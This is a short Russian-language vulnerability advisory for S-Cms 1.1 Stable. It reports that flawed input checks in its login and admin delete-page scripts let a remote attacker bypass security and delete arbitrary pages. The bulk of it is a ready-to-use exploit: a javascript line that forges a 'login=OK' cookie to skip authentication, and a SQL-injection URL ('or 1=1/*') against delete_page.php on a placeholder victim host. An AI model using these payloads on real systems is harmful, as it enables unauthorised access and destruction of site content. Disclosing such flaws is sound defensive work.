Программа: S-Cms 1.1 Stable

Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных сценариями /login_action.php и /admin/delete_page.php.
Эксплуатирование уязвимости приведет к обходу ограничений безопасности и
позволит удалить произвольные web страницы.

Эксплоит:

javascript:document.cookie = "login=OK; path=/"
2- http://[victim].org/path/admin/delete_page.php?id=’ or 1=1/*



Оставить мнение